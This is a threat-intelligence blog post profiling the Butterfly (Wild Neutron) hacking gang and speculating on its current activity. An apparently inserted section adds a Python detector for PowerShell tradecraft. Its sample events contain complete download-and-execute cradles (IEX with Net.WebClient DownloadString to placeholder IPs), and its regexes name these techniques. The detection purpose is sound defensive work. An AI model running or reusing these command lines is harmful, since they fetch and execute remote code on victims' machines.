The Butterfly Gang — Where Are They Now?

Still making money, I suspect!

Gavin O'Gorman
Threat Intel
Jul 12, 2018 · 5 min read

One of the most interesting groups I have investigated in the course of my career in cyber security is the Butterfly gang, aka Wild Neutron. This group is regularly discussed by security researchers — “You see anything from these guys lately?” is the usual question I and others ask, typically after a few drinks. They are a veritable Yeti (not the crouching type), or Loch Ness monster: often discussed, never seen. So, why do they evoke such interest? They were one of the best groups of hackers we’ve encountered that (probably) didn’t work for a government. Active from around 2011, they used zero-day exploits, custom malware, SQL injection attacks, encrypted command and control (C&C) servers, and watering hole attacks, among many other tricks, to compromise multiple organizations until mid-2015, when they disappeared.

Who was the Butterfly gang?

My favorite theory is that they were using information stolen from organizations to make money from the stock market. There were at least three instances we identified where a company was discussed in the media with respect to some upcoming organizational change that would affect the company and its stock price in some way. A few days after the media publication, the Butterfly gang would hack into the company, steal the information they were looking for and then leave, cleaning up traces of their activity as they went. There’s no way to know if they then profited from this data: that’s the beauty of their approach.

They went after major tech companies including Twitter, Facebook, Apple, and Microsoft, as well as targeting law firms, big pharma, and mining companies. In 2017, Reuters published an article claiming that during the Microsoft compromise of 2013, the Butterfly gang obtained access to Microsoft’s bug database, clearly looking for vulnerabilities that could be used to facilitate its attacks. It’s possible that the attacks against the other tech companies were for a similar purpose, to obtain information or tools that would help them in future work.

Technically, the Butterfly gang was very good. Not excellent, but very good. They used at least two zero-day exploits in their attacks, one against a Java vulnerability and the other against an Internet Explorer 10 (IE10) vulnerability. The IE10 vulnerability was never formally identified. It is possible that this vulnerability was stolen in the 2013 attack. Likely there were other exploits used that were never discovered. When cleaning up victim machines, the gang would use secure deletion tools such as shred to ensure that the malware they had installed on victim computers was thoroughly deleted. Their C&C servers appeared to be virtual machines running inside encrypted volumes, making forensic analysis very difficult. Once access was gained on a network, the Butterfly gang would typically spread to email servers or document repositories, and then steal the information they wanted. Access to a victim network would sometimes be maintained for a period of time, but a lot of their activity seemed to involve smash-and-grab attacks, where they would move in and out relatively quickly.

There were a few disconcerting oddities in some of their victims. At one major technology company, the compromised computer was used to monitor internal physical security systems. The Butterfly gang had access to CCTV and electronically controlled doors, potentially giving them the ability to physically compromise a site. Scary stuff. A less Mission Impossible theory is that they could use the CCTV access in an attempt to see what passwords users were typing.

Separately, Kaspersky identified a “jihadist forum” being targeted by the Butterfly gang. This is completely at odds with the rest of the gang’s targeting. To account for this targeting, it’s possible that the Butterfly gang were hackers for hire, paid to attack specific targets; the jihadi forum attack performed on behalf of one client, and the various other finance related attacks performed on the behalf of another.

The group did make mistakes though. The fact that I am even writing this, that the security industry was able to tie together a number of its attacks, demonstrates that. It reused the Jripbot malware against multiple victims, and underestimated the ability of antivirus software to track the tool, thus linking activity. Its 2012 attack, which resulted in the compromise of a number of big fish, was noisy and garnered a lot of attention. The group does appear, however, to have learned from its mistakes, doubtless helped in no small part by industry (including Symantec) reporting on its activity. After our publication, and a similar publication from Kaspersky, no more victims were discovered. No sign of the Jripbot malware was seen, or any of its other custom developed tools. Has the Butterfly gang just disappeared? Shut up shop?

Where is the Butterfly gang now?

If my favorite theory is true, and these attackers were making money on the stock market, I think it’s very unlikely that they would just stop. It seems to me to be a potentially very effective way to make money, with minimal risk for the attackers. If they are judicious in trading on stolen information, and are not greedy about making large amounts of money in single transactions, I’d imagine that it’s very difficult to detect such activity (this might show just how much I know about the stock market, which is pretty much nothing). However, I suspect that the Butterfly attackers completely abandoned everything they used in the past, and instead have likely moved to using open source tools: common hacking tools that are openly available and difficult to associate with any given actor. It’s the technique du jour, used by many different hacking groups over the past few years.

Quite possibly we have run into the Butterfly attackers again during an investigation where something like PowerShell was used to deliver a Metasploit remote access module, but we simply didn’t know it was them. They have effectively shed their past, like a caterpillar turning into a butterfly. (I really wish we’d named the group caterpillar now, and that simile would work a lot better).
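Open source tooling may be hard to attribute, but it is not hard to detect, and the PowerShell-delivered stager mentioned above is exactly the sort of activity that process-creation telemetry exposes. The following Python is an added example of mine, not code from the author, Symantec or any investigation: it scores constructed process-creation events (the kind of record Sysmon Event ID 1 or an EDR agent produces) for common PowerShell tradecraft such as encoded commands, download cradles, hidden windows, execution-policy bypass and an Office parent process. The hostnames, command lines, IP addresses, indicator weights and alert threshold are all made up for illustration.

```python
"""Score Windows process-creation events for PowerShell download-cradle and
encoded-command tradecraft. Added example; every event below is constructed."""
import base64
import re

# Indicators weighted roughly by how rarely they appear in benign administration.
# Weights and threshold are assumptions for the example, not tuned values.
INDICATORS = [
    ("encoded_command",
     re.compile(r"-e(?:ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("download_cradle",
     re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I), 3),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 2),
    # Base64 + gzip blobs inlined in the script are typical of generated stagers.
    ("inline_stager", re.compile(r"FromBase64String|GzipStream|MemoryStream", re.I), 2),
    ("no_profile", re.compile(r"-nop\b|-noprofile\b|-noni\b|-noninteractive\b", re.I), 1),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ALERT_THRESHOLD = 5


def encode_powershell(script):
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or '' if absent or undecodable."""
    m = re.search(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event):
    """Return (score, matched indicator names) for one process-creation event."""
    cmdline = event["cmdline"]
    # Only PowerShell hosts are in scope for this rule.
    if not re.search(r"\b(?:powershell|pwsh)(?:\.exe)?\b", cmdline, re.I):
        return 0, []
    # Scan the visible command line and the decoded payload together, so an
    # attacker gains nothing by hiding the cradle behind -EncodedCommand.
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            score += weight
            hits.append(name)
    if event.get("parent", "").lower() in OFFICE_PARENTS:
        score += 3
        hits.append("office_parent")
    return score, hits


def find_alerts(events, threshold=ALERT_THRESHOLD):
    """Return one alert record per event whose score reaches the threshold."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            alerts.append({"host": ev["host"], "score": score, "hits": hits})
    return alerts


# Constructed sample telemetry (hypothetical hosts and documentation-range IPs).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/x')"
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "ws02", "parent": "winword.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object "
                "Net.WebClient).DownloadString('http://203.0.113.10/a')\""},
    {"host": "ws03", "parent": "cmd.exe",
     "cmdline": "powershell.exe -NonI -W Hidden -enc " + encode_powershell(STAGER)},
    {"host": "srv01", "parent": "services.exe",
     "cmdline": "C:\\Windows\\System32\\cmd.exe /c dir"},
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert)
```

The benign `Get-Date` invocation scores 1 and is never surfaced, while both the clear-text cradle launched from Word and the encoded stager launched from cmd.exe cross the threshold. The weights are deliberately additive rather than any single regex being an alert on its own, because individual flags such as `-NoProfile` or `-WindowStyle Hidden` are common in legitimate scheduled tasks.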

Waffle aside, this was an interesting group to have worked on, and it is also interesting to speculate how many similar groups are active: operating extremely discreetly, making money from hacking, with no one knowing about them.

Check out the Security Response blog and follow Threat Intel on Twitter to keep up-to-date with the latest happenings in the world of threat intelligence and cyber security.